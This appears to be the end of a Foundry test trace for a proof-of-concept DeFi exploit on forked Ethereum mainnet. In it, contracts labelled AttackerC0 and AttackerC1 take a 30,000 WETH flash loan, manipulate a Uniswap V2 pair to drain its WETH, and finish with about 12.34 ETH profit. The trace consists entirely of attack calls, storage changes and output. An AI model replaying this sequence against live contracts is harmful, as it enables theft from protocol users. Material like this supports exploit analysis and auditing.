    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xb292678438245Ec863F9FEa64AFfcEA887144240, to: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], value: 2165867096846036817930 [2.165e21])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x59df4c67690e213c36bb4b4bd2d4893b5d0088ee60d82c462e88a6d11be8cf93: 0x0000000000000000000000000000000000000000000507f0eac3f2421a881400 → 0x00000000000000000000000000000000000000000005086654359b95811eec0a
    │   │   │   │   │   │   │   │   │   @ 0x3c3f86b3bfb9ebd96b8c1433a21c82b94034bb1e7126d8727767a142b855f6f4: 0x0000000000000000000000000000000000000000000000eafdd3c26fb2a0bcd3 → 0x0000000000000000000000000000000000000000000000759462191c4c09e4c9
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 11526249223479392795399 [1.152e22])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xb292678438245Ec863F9FEa64AFfcEA887144240, to: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], value: 11526249223479392795399 [1.152e22])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x6ea3e27d25b3a250b6e03722c916b2f406ced69192fd5b78be1bafeaade7a467: 0x0000000000000000000000000000000000000000000001789ff3cd0cd84609f0 → 0x0000000000000000000000000000000000000000000003e976cb151e778304f7
    │   │   │   │   │   │   │   │   @ 0xc0809db1e4ce3cd10e251fe0ccd014d4a6c274d92ce61b032235255c192b6a77: 0x0000000000000000000000000000000000000000000004e29231cbda20597fee → 0x000000000000000000000000000000000000000000000271bb5a83c8811c84e7
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [751] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   │   │   ├─ [579] 0x539D54074E052ae82de4936Ae6BB213AB773559E::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2168961192698674013385 [2.168e21]
    │   │   │   │   │   │   │   └─ ← [Return] 2168961192698674013385 [2.168e21]
    │   │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 11542715293798649070823 [1.154e22]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 2168961192698674013385 [2.168e21], reserve1: 11542715293798649070823 [1.154e22])
    │   │   │   │   │   │   ├─ emit Burn(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0: 2165867096846036817930 [2.165e21], amount1: 11526249223479392795399 [1.152e22], to: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xcdb8a2af510e9088603a0bdb160f78447b41467a390f2bc0cbcb76fe99726a07: 0x00000000000000000000000000000000000000000000021d53e822e9e7add4e7 → 0
    │   │   │   │   │   │   │   @ 0: 0x00000000000000000000000000000000000000000000043b6dc8eca499edd4e7 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   │   │   │   │   │   @ 8: 0x6775418f0000000004e29231cbda20597fee0000000000eafdd3c26fb2a0bcd3 → 0x6775418f000000000271bb5a83c8811c84e70000000000759462191c4c09e4c9
    │   │   │   │   │   │   └─ ← [Return] 2165867096846036817930 [2.165e21], 11526249223479392795399 [1.152e22]
    │   │   │   │   │   └─ ← [Return] 2165867096846036817930 [2.165e21], 11526249223479392795399 [1.152e22]
    │   │   │   │   ├─ [751] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::balanceOf(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2]) [staticcall]
    │   │   │   │   │   ├─ [579] 0x539D54074E052ae82de4936Ae6BB213AB773559E::balanceOf(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2]) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 6084295665758760779836426 [6.084e24]
    │   │   │   │   │   └─ ← [Return] 6084295665758760779836426 [6.084e24]
    │   │   │   │   ├─ [33172] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokensSupportingFeeOnTransferTokens(6084295665758760779836426 [6.084e24], 0, [0x05641E33Fd15BAf819729dF55500b07b82Eb8E89, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ [7053] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::transferFrom(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 0xb292678438245Ec863F9FEa64AFfcEA887144240, 6084295665758760779836426 [6.084e24])
    │   │   │   │   │   │   ├─ [6869] 0x539D54074E052ae82de4936Ae6BB213AB773559E::transferFrom(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 0xb292678438245Ec863F9FEa64AFfcEA887144240, 6084295665758760779836426 [6.084e24]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], to: 0xb292678438245Ec863F9FEa64AFfcEA887144240, value: 6084295665758760779836426 [6.084e24])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640557946446979227116268916189 [1.157e77])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x3c3f86b3bfb9ebd96b8c1433a21c82b94034bb1e7126d8727767a142b855f6f4: 0x0000000000000000000000000000000000000000000000759462191c4c09e4c9 → 0x0000000000000000000000000000000000000000000508dbe897b4b1cd28d0d3
    │   │   │   │   │   │   │   │   @ 0xbd56633204ebe5d18bf9e0c1856ca4eab9ae4131565fd1b63738c213dd14d7d8: 0xfffffffffffffffffffffffffffffffffffffffffffffe278feced2f1d3a79e7 → 0xfffffffffffffffffffffffffffffffffffffffffffaf5c13bb751999c1b8ddd
    │   │   │   │   │   │   │   │   @ 0x59df4c67690e213c36bb4b4bd2d4893b5d0088ee60d82c462e88a6d11be8cf93: 0x00000000000000000000000000000000000000000005086654359b95811eec0a → 0
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 18473750776520607204599 [1.847e22]
    │   │   │   │   │   ├─ [504] 0xb292678438245Ec863F9FEa64AFfcEA887144240::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2168961192698674013385 [2.168e21], 11542715293798649070823 [1.154e22], 1735737743 [1.735e9]
    │   │   │   │   │   ├─ [751] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   │   ├─ [579] 0x539D54074E052ae82de4936Ae6BB213AB773559E::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 6086464626951459453849811 [6.086e24]
    │   │   │   │   │   │   └─ ← [Return] 6086464626951459453849811 [6.086e24]
    │   │   │   │   │   ├─ [16654] 0xb292678438245Ec863F9FEa64AFfcEA887144240::swap(0, 11538589580556677100607 [1.153e22], AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 0x)
    │   │   │   │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 11538589580556677100607 [1.153e22])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xb292678438245Ec863F9FEa64AFfcEA887144240, to: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], value: 11538589580556677100607 [1.153e22])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x6ea3e27d25b3a250b6e03722c916b2f406ced69192fd5b78be1bafeaade7a467: 0x0000000000000000000000000000000000000000000003e976cb151e778304f7 → 0x00000000000000000000000000000000000000000000065af8e41e914fc23936
    │   │   │   │   │   │   │   │   @ 0xc0809db1e4ce3cd10e251fe0ccd014d4a6c274d92ce61b032235255c192b6a77: 0x000000000000000000000000000000000000000000000271bb5a83c8811c84e7 → 0x00000000000000000000000000000000000000000000000039417a55a8dd50a8
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [751] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   │   │   ├─ [579] 0x539D54074E052ae82de4936Ae6BB213AB773559E::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 6086464626951459453849811 [6.086e24]
    │   │   │   │   │   │   │   └─ ← [Return] 6086464626951459453849811 [6.086e24]
    │   │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 4125713241971970216 [4.125e18]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 6086464626951459453849811 [6.086e24], reserve1: 4125713241971970216 [4.125e18])
    │   │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 6084295665758760779836426 [6.084e24], amount1In: 0, amount0Out: 0, amount1Out: 11538589580556677100607 [1.153e22], to: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 8: 0x6775418f000000000271bb5a83c8811c84e70000000000759462191c4c09e4c9 → 0x6775418f00000000000039417a55a8dd50a80000000508dbe897b4b1cd28d0d3
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 30012340357077284305206 [3.001e22]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0xBA12222222228d8Ba445958a75a0704d566BF2C8, 30000000000000000000000 [3e22])
    │   │   │   │   │   ├─ emit Transfer(from: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], to: 0xBA12222222228d8Ba445958a75a0704d566BF2C8, value: 30000000000000000000000 [3e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x0000000000000000000000000000000000000000000000a169bf823c477bd216 → 0x0000000000000000000000000000000000000000000006fbb761df6c5e3bd216
    │   │   │   │   │   │   @ 0x6ea3e27d25b3a250b6e03722c916b2f406ced69192fd5b78be1bafeaade7a467: 0x00000000000000000000000000000000000000000000065af8e41e914fc23936 → 0x000000000000000000000000000000000000000000000000ab41c16139023936
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xBA12222222228d8Ba445958a75a0704d566BF2C8) [staticcall]
    │   │   │   │   └─ ← [Return] 32977545748157180924438 [3.297e22]
    │   │   │   ├─ emit FlashLoan(param0: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], param1: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, param2: 30000000000000000000000 [3e22], param3: 0)
    │   │   │   └─ ← [Stop]
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2]) [staticcall]
    │   │   │   └─ ← [Return] 12340357077284305206 [1.234e19]
    │   │   ├─ [9195] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::withdraw(12340357077284305206 [1.234e19])
    │   │   │   ├─ [55] AttackerC1::receive{value: 12340357077284305206}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Withdrawal(src: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], wad: 12340357077284305206 [1.234e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x6ea3e27d25b3a250b6e03722c916b2f406ced69192fd5b78be1bafeaade7a467: 0x000000000000000000000000000000000000000000000000ab41c16139023936 → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [0] AttackerC0::receive{value: 12340357077284305206}()
    │   │   │   └─ ← [Stop]
    │   │   └─ ← [Stop]
    │   └─ ← [Return] 68 bytes of code
    ├─ [0] console::log("Final balance in ETH :", 12340357077284305206 [1.234e19]) [staticcall]
    │   └─ ← [Stop]
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 17.79s (12.12s CPU time)

Ran 2 test suites in 19.13s (22.71s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
